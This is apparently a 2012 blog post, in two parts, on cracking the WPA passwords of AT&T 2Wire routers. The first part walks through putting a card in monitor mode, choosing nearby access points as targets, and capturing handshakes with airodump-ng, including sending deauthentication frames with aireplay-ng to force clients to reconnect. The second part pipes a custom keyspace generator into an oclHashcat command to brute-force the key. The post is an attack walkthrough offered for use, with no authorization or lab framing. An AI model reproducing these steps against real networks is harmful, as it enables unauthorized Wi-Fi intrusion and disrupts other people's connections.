Part 2. Cracking AT&T WPA1/2

Monday, September 24, 2012 Posted by Unknown 0 comments

Part 2. Cracking AT&T WPA1/2 with python script and hashcat.

Once you get the four way handshake from part 1.

My python script can be found here. It creates a CPU pool based on how many cores you have. Based on python 2.7.3 and Linux OS.

What the script does is count from 000000000 to 9999999999 skipping any number that has three repeating numbers in a row.  so you wont have keys like 1234555678 because it repeats 5 three times. This is because AT&T decided to make their numbers to random cutting their key space down. Its faster to count through and skip past repeating numbers then to process each number.

To change what the programs start on open it and change the following line to whatever you want:

start = str(7)

To run the program pipe it to hashcat-plus.

python 2wireWPAiter.py | ./oclHashcat-plus64.bin -m 2500 -a 0 --gpu-accel=160 --gpu-loops=1024 ../dir/2WIREHandShake.hccap
With a AMD driver 12.8 and SDK 2.7 I get about 86K keys  per second. With the built in brute-force I get 114K keys per second. Still working on how to improve my out put speed. 

To get more info on hashcat look here.

straight brute force on known key starting with 7 saved over an hour.

Screen shots.. With script                without script 


Someone in the hashcat room just told me a better way of doing this to make it even faster and more accurate. using http://hashcat.net/wiki/doku.php?id=statsprocessor making a hcstat file. Utilizing Markov chains. I will do this later tonight and post my results.

Edit: you can't use Markov chains with hashcat for this. 
Labels: , , , ,

PART 1: Cracking AT&T WPA1/2

Posted by Unknown 0 comments
Part 1. Getting the handshake.

Aircrack's site has a pretty good tutorial.

Boot from Back Track 5 R3

First you want to see what kind of wifi connection you have to choose from. Start your wireless interface in monitor mode.

#airmon-zc start wlan0
#airodump-ng --encrypt wpa mon0 

You should see several AP. Record the BSSID and Channel along with any associated clients shown at the bottom of airodump-ng.

Once you find a couple targets on the same channel. You need to close airodump and stop airmon

#airmon-zc stop mon0

Start airmon-zc on the channel of the target.

#airmon-zc start wlan0 <Channel Number>

Then start airodump on the same channel along with some other options.

#airodump-ng mon0 --encrypt wpa --write FILENAME --output-format pcap -a --channel <Channel number>

 Channel number need to be the same as your target to so you can get the full four way handshake between the client and the AP.  Airodump should show in the top right hand corner once you get a handshake.

Instead of waiting around for a client to connect you can deauthenticate a client and wait for it to auto reconnect.

#aireplay-ng -0 5 -a 00:14:6C:7E:40:80 -c 00:0F:B5:FD:FB:C2 mon0


Where:
  • -0 means deauthentication
  • 5 is the number of deauths to send
  • -a 00:14:6C:7E:40:80 is the MAC address of the access point
  • -c 00:0F:B5:FD:FB:C2 is the MAC address of the client you are deauthing
  • mon0 is the interface name

If you are using backtrack you can easily check your .pcap file to see if it has a proper handshake by using pyrit. or you can load up wireshark and run a filter for EAPOL what I will show in a future post.

#pyrit -r FILENAME.pcap analyze 

The output should tell you if you have good EAPOL handshake or workable or nothing at all if none are found.

To strip out all the crap out of your pcap file expect for your handshakes run the following:

 #pyrit -r FILENAME.pcap -o OUTPUT.pcap strip

To turn your pcap file into a hashcat-plus friendly file you can upload it to https://hashcat.net/cap2hccap/ or use the steps they tell you to convert it your self. I just use their site.


Labels: , , ,
Subscribe to: Posts (Atom)